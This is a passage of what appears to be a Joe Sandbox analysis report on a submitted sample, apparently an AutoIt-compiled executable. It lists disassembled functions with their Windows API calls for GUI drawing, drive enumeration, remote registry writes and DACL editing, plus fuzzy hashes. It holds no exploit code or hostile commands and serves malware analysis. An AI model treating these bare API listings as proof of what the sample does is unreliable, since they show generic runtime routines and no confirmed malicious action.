                                                      • SetBkColor.GDI32(?,000000FF), ref: 00FB7186
                                                      • SelectObject.GDI32(?,?), ref: 00FB7195
                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 00FB71C0
                                                      • GetSysColor.USER32(00000010), ref: 00FB71C8
                                                      • CreateSolidBrush.GDI32(00000000), ref: 00FB71CF
                                                      • FrameRect.USER32(?,?,00000000), ref: 00FB71DE
                                                      • DeleteObject.GDI32(00000000), ref: 00FB71E5
                                                      • InflateRect.USER32(?,000000FE,000000FE), ref: 00FB7230
                                                      • FillRect.USER32(?,?,?), ref: 00FB7262
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00FB7284
                                                        • Part of subcall function 00FB73E8: GetSysColor.USER32(00000012), ref: 00FB7421
                                                        • Part of subcall function 00FB73E8: SetTextColor.GDI32(?,?), ref: 00FB7425
                                                        • Part of subcall function 00FB73E8: GetSysColorBrush.USER32(0000000F), ref: 00FB743B
                                                        • Part of subcall function 00FB73E8: GetSysColor.USER32(0000000F), ref: 00FB7446
                                                        • Part of subcall function 00FB73E8: GetSysColor.USER32(00000011), ref: 00FB7463
                                                        • Part of subcall function 00FB73E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00FB7471
                                                        • Part of subcall function 00FB73E8: SelectObject.GDI32(?,00000000), ref: 00FB7482
                                                        • Part of subcall function 00FB73E8: SetBkColor.GDI32(?,00000000), ref: 00FB748B
                                                        • Part of subcall function 00FB73E8: SelectObject.GDI32(?,?), ref: 00FB7498
                                                        • Part of subcall function 00FB73E8: InflateRect.USER32(?,000000FF,000000FF), ref: 00FB74B7
                                                        • Part of subcall function 00FB73E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00FB74CE
                                                        • Part of subcall function 00FB73E8: GetWindowLongW.USER32(00000000,000000F0), ref: 00FB74DB
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                      • String ID:
                                                      • API String ID: 4124339563-0
                                                      • Opcode ID: 4888376bd404de51db68c480c43f9f4e86e9e8434c1be4ab09a5ba5706f9b33a
                                                      • Instruction ID: 4277e910076a50b7e11f1922f7bd2f0722bb9ba6940ec8c1eb0ccf9e2cc40b47
                                                      • Opcode Fuzzy Hash: 4888376bd404de51db68c480c43f9f4e86e9e8434c1be4ab09a5ba5706f9b33a
                                                      • Instruction Fuzzy Hash: E1A1A472408305AFD710AF65DC88E9B77A9FF89320F140B19F9A2961E1D731E944EFA1
                                                      Function 00F38D85 Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 480windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • DestroyWindow.USER32(?,?), ref: 00F38E14
                                                      • SendMessageW.USER32(?,00001308,?,00000000), ref: 00F76AC5
                                                      • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00F76AFE
                                                      • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00F76F43
                                                        • Part of subcall function 00F38F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00F38BE8,?,00000000,?,?,?,?,00F38BBA,00000000,?), ref: 00F38FC5
                                                      • SendMessageW.USER32(?,00001053), ref: 00F76F7F
                                                      • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00F76F96
                                                      • ImageList_Destroy.COMCTL32(00000000,?), ref: 00F76FAC
                                                      • ImageList_Destroy.COMCTL32(00000000,?), ref: 00F76FB7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                      • String ID: 0
                                                      • API String ID: 2760611726-4108050209
                                                      • Opcode ID: 691caa02bf74304fce77207674a324eebd83d42270de909aaef4e10396f86152
                                                      • Instruction ID: bb0946e0392864d08af223d4bd598e5e07483e900d4b4a68f78073665fb0a689
                                                      • Opcode Fuzzy Hash: 691caa02bf74304fce77207674a324eebd83d42270de909aaef4e10396f86152
                                                      • Instruction Fuzzy Hash: 56129D30A00605DFD725CF24C884BA6BBA5FF45320F14856AF489DB261CB75AC92FF92
                                                      Function 00FA2711 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • DestroyWindow.USER32(00000000), ref: 00FA273E
                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00FA286A
                                                      • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00FA28A9
                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00FA28B9
                                                      • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00FA2900
                                                      • GetClientRect.USER32(00000000,?), ref: 00FA290C
                                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00FA2955
                                                      • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00FA2964
                                                      • GetStockObject.GDI32(00000011), ref: 00FA2974
                                                      • SelectObject.GDI32(00000000,00000000), ref: 00FA2978
                                                      • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00FA2988
                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00FA2991
                                                      • DeleteDC.GDI32(00000000), ref: 00FA299A
                                                      • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00FA29C6
                                                      • SendMessageW.USER32(00000030,00000000,00000001), ref: 00FA29DD
                                                      • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00FA2A1D
                                                      • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00FA2A31
                                                      • SendMessageW.USER32(00000404,00000001,00000000), ref: 00FA2A42
                                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00FA2A77
                                                      • GetStockObject.GDI32(00000011), ref: 00FA2A82
                                                      • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00FA2A8D
                                                      • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00FA2A97
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                      • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                      • API String ID: 2910397461-517079104
                                                      • Opcode ID: b498dd16201ca3ced12748cb0e31e9fe3b173a40314e30803cd943d188040811
                                                      • Instruction ID: 53c4373eb2515f07c105feaa44bf5bc2734694479ac605afb86905b4a8d6a369
                                                      • Opcode Fuzzy Hash: b498dd16201ca3ced12748cb0e31e9fe3b173a40314e30803cd943d188040811
                                                      • Instruction Fuzzy Hash: D2B13CB1A00219AFEB14DF68DC86EAB7BA9FF49710F004215F915EB290D774ED40DBA0
                                                      Function 00F94ADF Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetErrorMode.KERNEL32(00000001), ref: 00F94AED
                                                      • GetDriveTypeW.KERNEL32(?,00FBCB68,?,\\.\,00FBCC08), ref: 00F94BCA
                                                      • SetErrorMode.KERNEL32(00000000,00FBCB68,?,\\.\,00FBCC08), ref: 00F94D36
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: ErrorMode$DriveType
                                                      • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                      • API String ID: 2907320926-4222207086
                                                      • Opcode ID: fa084152a5a38dde6c2afe6bbe380a3c6256e1610b2f544f14c382c16a845c9a
                                                      • Instruction ID: 41bf63b35904fbfc3ae3ccc3c6a92daf03681829b3289dbf0d06a871ad32413b
                                                      • Opcode Fuzzy Hash: fa084152a5a38dde6c2afe6bbe380a3c6256e1610b2f544f14c382c16a845c9a
                                                      • Instruction Fuzzy Hash: B961E43160514A9FDF24DF26CE82E6DB7A0AF68354B244056F806EB291DB35FD42FB42
                                                      Function 00FB73E8 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetSysColor.USER32(00000012), ref: 00FB7421
                                                      • SetTextColor.GDI32(?,?), ref: 00FB7425
                                                      • GetSysColorBrush.USER32(0000000F), ref: 00FB743B
                                                      • GetSysColor.USER32(0000000F), ref: 00FB7446
                                                      • CreateSolidBrush.GDI32(?), ref: 00FB744B
                                                      • GetSysColor.USER32(00000011), ref: 00FB7463
                                                      • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00FB7471
                                                      • SelectObject.GDI32(?,00000000), ref: 00FB7482
                                                      • SetBkColor.GDI32(?,00000000), ref: 00FB748B
                                                      • SelectObject.GDI32(?,?), ref: 00FB7498
                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 00FB74B7
                                                      • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00FB74CE
                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00FB74DB
                                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00FB752A
                                                      • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00FB7554
                                                      • InflateRect.USER32(?,000000FD,000000FD), ref: 00FB7572
                                                      • DrawFocusRect.USER32(?,?), ref: 00FB757D
                                                      • GetSysColor.USER32(00000011), ref: 00FB758E
                                                      • SetTextColor.GDI32(?,00000000), ref: 00FB7596
                                                      • DrawTextW.USER32(?,00FB70F5,000000FF,?,00000000), ref: 00FB75A8
                                                      • SelectObject.GDI32(?,?), ref: 00FB75BF
                                                      • DeleteObject.GDI32(?), ref: 00FB75CA
                                                      • SelectObject.GDI32(?,?), ref: 00FB75D0
                                                      • DeleteObject.GDI32(?), ref: 00FB75D5
                                                      • SetTextColor.GDI32(?,?), ref: 00FB75DB
                                                      • SetBkColor.GDI32(?,?), ref: 00FB75E5
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                      • String ID:
                                                      • API String ID: 1996641542-0
                                                      • Opcode ID: 95e47ef59282e4f45fc804421167cb95eda4541fefa063d658fabbb561d3c4ed
                                                      • Instruction ID: dec36c8093acb84eeee3c84cd3b1ae67656042a5b676baf5f17d36f1383df8fc
                                                      • Opcode Fuzzy Hash: 95e47ef59282e4f45fc804421167cb95eda4541fefa063d658fabbb561d3c4ed
                                                      • Instruction Fuzzy Hash: 31617F72D00218AFDB11AFA4DC88EEE7F79EB48320F144211F915BB2A1D7709940EF90
                                                      Function 00FB0FF3 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetCursorPos.USER32(?), ref: 00FB1128
                                                      • GetDesktopWindow.USER32 ref: 00FB113D
                                                      • GetWindowRect.USER32(00000000), ref: 00FB1144
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00FB1199
                                                      • DestroyWindow.USER32(?), ref: 00FB11B9
                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00FB11ED
                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00FB120B
                                                      • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00FB121D
                                                      • SendMessageW.USER32(00000000,00000421,?,?), ref: 00FB1232
                                                      • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00FB1245
                                                      • IsWindowVisible.USER32(00000000), ref: 00FB12A1
                                                      • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00FB12BC
                                                      • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00FB12D0
                                                      • GetWindowRect.USER32(00000000,?), ref: 00FB12E8
                                                      • MonitorFromPoint.USER32(?,?,00000002), ref: 00FB130E
                                                      • GetMonitorInfoW.USER32(00000000,?), ref: 00FB1328
                                                      • CopyRect.USER32(?,?), ref: 00FB133F
                                                      • SendMessageW.USER32(00000000,00000412,00000000), ref: 00FB13AA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                      • String ID: ($0$tooltips_class32
                                                      • API String ID: 698492251-4156429822
                                                      • Opcode ID: 7bdada09c5fa29c8f487fbf0e4a1b56fee8dc98f0ff2caf08d3a20018a901193
                                                      • Instruction ID: 893cd538ce043e8a4892e3f49c8c3ae41b91f1918eb32daea84c1338d056bc64
                                                      • Opcode Fuzzy Hash: 7bdada09c5fa29c8f487fbf0e4a1b56fee8dc98f0ff2caf08d3a20018a901193
                                                      • Instruction Fuzzy Hash: D1B1BC71608340AFD700DF25C885BABBBE4FF88350F448918F9999B2A1D771E844EF91
                                                      Function 00FB0241 Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CharUpperBuffW.USER32(?,?), ref: 00FB02E5
                                                      • _wcslen.LIBCMT ref: 00FB031F
                                                      • _wcslen.LIBCMT ref: 00FB0389
                                                      • _wcslen.LIBCMT ref: 00FB03F1
                                                      • _wcslen.LIBCMT ref: 00FB0475
                                                      • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00FB04C5
                                                      • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00FB0504
                                                        • Part of subcall function 00F3F9F2: _wcslen.LIBCMT ref: 00F3F9FD
                                                        • Part of subcall function 00F8223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00F82258
                                                        • Part of subcall function 00F8223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00F8228A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: _wcslen$MessageSend$BuffCharUpper
                                                      • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                      • API String ID: 1103490817-719923060
                                                      • Opcode ID: a0b132aeaae69b2c0c5f97609a108f1721887cab9a16986da4a8c725e876e336
                                                      • Instruction ID: 7512a187b06f5db04b15d019805c2e5c49c9ccceb638d1c637b5765f205afba5
                                                      • Opcode Fuzzy Hash: a0b132aeaae69b2c0c5f97609a108f1721887cab9a16986da4a8c725e876e336
                                                      • Instruction Fuzzy Hash: 6AE1B0316083418FC714EF26C9519ABB3E6BF88324F14496CF8969B2A5DB34ED45EF81
                                                      Function 00F38891 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00F38968
                                                      • GetSystemMetrics.USER32(00000007), ref: 00F38970
                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00F3899B
                                                      • GetSystemMetrics.USER32(00000008), ref: 00F389A3
                                                      • GetSystemMetrics.USER32(00000004), ref: 00F389C8
                                                      • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00F389E5
                                                      • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00F389F5
                                                      • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00F38A28
                                                      • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00F38A3C
                                                      • GetClientRect.USER32(00000000,000000FF), ref: 00F38A5A
                                                      • GetStockObject.GDI32(00000011), ref: 00F38A76
                                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 00F38A81
                                                        • Part of subcall function 00F3912D: GetCursorPos.USER32(?), ref: 00F39141
                                                        • Part of subcall function 00F3912D: ScreenToClient.USER32(00000000,?), ref: 00F3915E
                                                        • Part of subcall function 00F3912D: GetAsyncKeyState.USER32(00000001), ref: 00F39183
                                                        • Part of subcall function 00F3912D: GetAsyncKeyState.USER32(00000002), ref: 00F3919D
                                                      • SetTimer.USER32(00000000,00000000,00000028,00F390FC), ref: 00F38AA8
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                      • String ID: AutoIt v3 GUI
                                                      • API String ID: 1458621304-248962490
                                                      • Opcode ID: 4defec221dc979382fd8bfeddfd1009e9decfd667eda6d8da38a8c9ef4b3c480
                                                      • Instruction ID: d2a10ba6efbbcd770d1fb8fa2e3af0c4c211c92dc6afbc24f4ef6658f1e428d6
                                                      • Opcode Fuzzy Hash: 4defec221dc979382fd8bfeddfd1009e9decfd667eda6d8da38a8c9ef4b3c480
                                                      • Instruction Fuzzy Hash: 4EB15C71A00209DFDB14DF68CC85BAA3BB5FF48364F104229FA15E7290DB74A841EF91
                                                      Function 00F80D8B Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00F810F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00F81114
                                                        • Part of subcall function 00F810F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00F80B9B,?,?,?), ref: 00F81120
                                                        • Part of subcall function 00F810F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00F80B9B,?,?,?), ref: 00F8112F
                                                        • Part of subcall function 00F810F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00F80B9B,?,?,?), ref: 00F81136
                                                        • Part of subcall function 00F810F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00F8114D
                                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00F80DF5
                                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00F80E29
                                                      • GetLengthSid.ADVAPI32(?), ref: 00F80E40
                                                      • GetAce.ADVAPI32(?,00000000,?), ref: 00F80E7A
                                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00F80E96
                                                      • GetLengthSid.ADVAPI32(?), ref: 00F80EAD
                                                      • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00F80EB5
                                                      • HeapAlloc.KERNEL32(00000000), ref: 00F80EBC
                                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00F80EDD
                                                      • CopySid.ADVAPI32(00000000), ref: 00F80EE4
                                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00F80F13
                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00F80F35
                                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00F80F47
                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00F80F6E
                                                      • HeapFree.KERNEL32(00000000), ref: 00F80F75
                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00F80F7E
                                                      • HeapFree.KERNEL32(00000000), ref: 00F80F85
                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00F80F8E
                                                      • HeapFree.KERNEL32(00000000), ref: 00F80F95
                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00F80FA1
                                                      • HeapFree.KERNEL32(00000000), ref: 00F80FA8
                                                        • Part of subcall function 00F81193: GetProcessHeap.KERNEL32(00000008,00F80BB1,?,00000000,?,00F80BB1,?), ref: 00F811A1
                                                        • Part of subcall function 00F81193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00F80BB1,?), ref: 00F811A8
                                                        • Part of subcall function 00F81193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00F80BB1,?), ref: 00F811B7
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                      • String ID:
                                                      • API String ID: 4175595110-0
                                                      • Opcode ID: c52cd55c64820cd0e2ddb39364fb04cc5e01c3433940214e02473ae747abdece
                                                      • Instruction ID: 0630e4f9fae484e51b0fd3763a8af5d674ceaa8ce520456c12afaa5fac4df8a2
                                                      • Opcode Fuzzy Hash: c52cd55c64820cd0e2ddb39364fb04cc5e01c3433940214e02473ae747abdece
                                                      • Instruction Fuzzy Hash: 55715E7190020AABDB60AFA5DC45FEFBBB8FF04350F448215FA59E6191DB319909DFA0
                                                      Function 00FAC3B7 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00FAC4BD
                                                      • RegCreateKeyExW.ADVAPI32(?,?,00000000,00FBCC08,00000000,?,00000000,?,?), ref: 00FAC544
                                                      • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 00FAC5A4
                                                      • _wcslen.LIBCMT ref: 00FAC5F4
                                                      • _wcslen.LIBCMT ref: 00FAC66F
                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 00FAC6B2
                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 00FAC7C1
                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 00FAC84D
                                                      • RegCloseKey.ADVAPI32(?), ref: 00FAC881
                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00FAC88E
                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 00FAC960
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
